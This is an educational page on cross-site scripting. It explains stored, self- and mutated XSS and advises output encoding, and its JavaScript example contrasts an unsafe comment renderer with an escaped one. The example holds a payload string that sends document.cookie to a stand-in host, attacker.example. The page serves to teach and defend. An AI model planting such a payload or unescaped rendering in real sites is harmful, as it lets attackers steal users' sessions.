Cross-site scripting

Cross-site scripting (XSS) is a client-side code injection attack. The attacker's goal is to have a script of their choosing execute in the victim's browser, in the security context of the vulnerable site, by getting malicious input reflected into the page without proper encoding.

In an XSS attack, the attacker uses your vulnerable web page to deliver malicious JavaScript to your users. Each user's browser then executes that JavaScript on the user's computer, with access to the page's DOM, cookies that are not HttpOnly, and any request the user is authorised to make. XSS is among the most common web vulnerabilities; surveys regularly find a large share of websites, often cited as roughly one in three, carrying at least one XSS flaw.

  • To protect against XSS, scan your website or web application regularly, and at least after every change to the code. Your developers must then correct the code, by output-encoding untrusted data for the context it is written into (HTML body, attribute, JavaScript, URL), rather than by trying to filter bad input. Contrary to popular opinion, web application firewalls do not protect against XSS; they only make the attack harder, and the vulnerability is still there.
  • Even though an XSS attack executes in the user's browser, it affects your website or web application. For example, an attacker may use it to steal a user's session or credentials and log in to your site as that user. If that user is an administrator, the attacker gains control over your website.
                                     

1.1. Types: Persistent XSS

Persistent (or stored) XSS is the more damaging variant of the flaw: it occurs when data supplied by the attacker is saved by the server (a comment, profile field, support ticket, filename) and then rendered on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. The attacker needs no interaction with the victim; every visitor to the affected page is attacked.
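The stored-comment flow described above, as an added example that is not part of the original page: a vulnerable renderer that interpolates stored data straight into HTML, beside the fixed version that output-encodes at render time (the correction the protection bullet above calls for). It runs in plain Node.js; `comments`, `renderCommentUnsafe`, `renderCommentSafe` and the attacker payload are constructed for the example.

```javascript
// Added example, not from the original page. Names below are assumptions.

// The "database": the attacker's comment is saved once and served to every
// later visitor, which is what makes the flaw persistent.
const comments = [];

function storeComment(author, body) {
  // Storing raw input is fine; the bug is in how it is later rendered.
  comments.push({ author, body });
}

// Vulnerable: interpolates stored data straight into the HTML body.
function renderCommentUnsafe(c) {
  return `<li><b>${c.author}</b>: ${c.body}</li>`;
}

// Minimal HTML escaper for text content and quoted attribute values. These
// five characters are the ones that can change parser state there; other
// contexts (JavaScript strings, URLs, CSS) need their own encoders.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, ch => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Fixed: every piece of untrusted data is escaped at output time.
function renderCommentSafe(c) {
  return `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</li>`;
}

function renderPage(render) {
  return `<ul>${comments.map(render).join('')}</ul>`;
}

// Constructed attacker payload: exfiltrates the cookie of whoever views it.
const PAYLOAD =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// Rough detection check used below: does the rendered page contain an
// unescaped script element or an inline event handler attribute?
function containsActiveScript(html) {
  return /<script\b|\bon\w+\s*=/i.test(html);
}

storeComment('alice', 'Nice article!');
storeComment('mallory', PAYLOAD);

const unsafePage = renderPage(renderCommentUnsafe);
const safePage = renderPage(renderCommentSafe);

console.log('unsafe page contains active script:', containsActiveScript(unsafePage)); // true
console.log('escaped page contains active script:', containsActiveScript(safePage));  // false
```

Note that `escapeHtml` is only correct for the HTML body and for attribute values that are quoted; data placed inside a `<script>` block, an `href`, or an unquoted attribute needs context-specific encoding, which is why templating engines that auto-escape per context are preferable to hand-written escaping.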

                                     

1.2. Types: Self-XSS

Self-XSS is a form of XSS that relies on social engineering rather than on a flaw in the site: the attacker tricks the victim into pasting and running malicious JavaScript in their own browser, typically in the developer console or the address bar. Because the victim executes the code themselves, it cannot be fixed by output encoding, which is why browsers print a warning when the console is opened.

                                     

1.3. Types: Mutated XSS

Mutated XSS (mXSS) happens when the attacker injects markup that looks safe to the server-side sanitizer, but is rewritten by the browser while it parses the page, for example when the markup is serialized through innerHTML and parsed again, so that the rewritten form contains executable script. Because the mutation happens inside the browser's parser, it is extremely hard to detect or sanitize in the web application's own logic; the practical defence is to sanitize the parsed DOM in the browser and reject markup that does not survive a parse-serialize-parse round trip unchanged.